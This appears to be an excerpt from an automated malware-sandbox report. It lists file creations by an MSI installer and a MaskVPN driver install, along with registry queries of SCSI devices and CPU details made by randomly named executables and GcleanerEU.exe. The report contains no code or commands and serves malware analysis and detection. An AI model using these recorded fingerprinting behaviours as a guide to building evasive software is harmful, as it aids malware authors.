| File opened for modification | C:\Windows\Installer\MSID196.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\INF\setupapi.dev.log | C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe | N/A |
| File created | C:\Windows\SystemTemp\~DFCB564044BE516524.TMP | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\LOGS\DPX\setuperr.log | C:\Windows\SysWOW64\expand.exe | N/A |
| File created | C:\Windows\Installer\f7613e2.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSICA33.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI2963.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\INF\setupapi.dev.log | C:\Windows\system32\DrvInst.exe | N/A |
| File created | C:\Windows\SystemTemp\~DFD9CC0FE48A200DED.TMP | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\inf\oem2.inf | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\Installer\f7613e2.msi | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\SystemTemp\~DFB465C1453DAD1923.TMP | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\INF\setupapi.dev.log | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI680E.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIDDCD.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIB3B.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIED6E.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIF687.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\inprogressinstallinfo.ipi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\inf\oem2.inf | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\LOGS\DPX\setupact.log | C:\Windows\SysWOW64\expand.exe | N/A |
| File opened for modification | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI37D5.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\AppCompat\Programs\Amcache.hve.tmp | C:\Windows\SysWOW64\WerFault.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSID65A.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIFA61.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI33B.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\ | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\SourceHash{B59E6947-D960-4A88-902E-F387AFD7DF1F} | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\INF\setupapi.dev.log | C:\Windows\system32\DrvInst.exe | N/A |
| File created | C:\Windows\SystemTemp\~DF364AB28D57026106.TMP | C:\Windows\system32\msiexec.exe | N/A |
Enumerates physical storage devices
Program crash
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\Documents\sDbLsfKmNulpdFRqs28XqruC.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0009 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\ConfigFlags | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0054 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004E | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\Documents\252N17XASxQvYmwIPdgoOr2I.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004A | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0003 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0018 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{3b2ce006-5e61-4fde-bab8-9b8aac9b26df}\0008 | C:\Windows\system32\svchost.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\Documents\252N17XASxQvYmwIPdgoOr2I.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0034 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0051 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004C | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0064 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Mfg | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0038 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\HardwareID | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2003 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008\ | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0008 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\UpperFilters | C:\Windows\system32\DrvInst.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000 | C:\Windows\system32\DrvInst.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0018 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\CompatibleIDs | C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\000A | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Phantom | C:\Windows\system32\DrvInst.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0008 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\CompatibleIDs | C:\Windows\system32\DrvInst.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0055 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\HardwareID | C:\Windows\system32\DrvInst.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Capabilities | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&135B206D&0&010000 | C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&135B206D&0&000000 | C:\Windows\system32\DrvInst.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\CompatibleIDs | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&135B206D&0&010000 | C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{3b2ce006-5e61-4fde-bab8-9b8aac9b26df}\0008 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\ConfigFlags | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004C | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0004 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Filters | C:\Windows\system32\DrvInst.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A\ | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\CompatibleIDs | C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0004 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0065 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\DeviceDesc | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Service | C:\Windows\system32\DrvInst.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\LowerFilters | C:\Windows\system32\DrvInst.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0006 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0008 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2002 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0058 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\CompatibleIDs | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\HardwareID | C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0009 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\300A | C:\Windows\system32\svchost.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Users\Admin\AppData\Local\Temp\x5uykbnn.ala\GcleanerEU.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Users\Admin\Documents\dnR4Dsm6tzLaz7X7Zl6o7ZVh.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Users\Admin\Documents\dnR4Dsm6tzLaz7X7Zl6o7ZVh.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Users\Admin\AppData\Local\Temp\x5uykbnn.ala\GcleanerEU.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Users\Admin\Documents\dnR4Dsm6tzLaz7X7Zl6o7ZVh.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
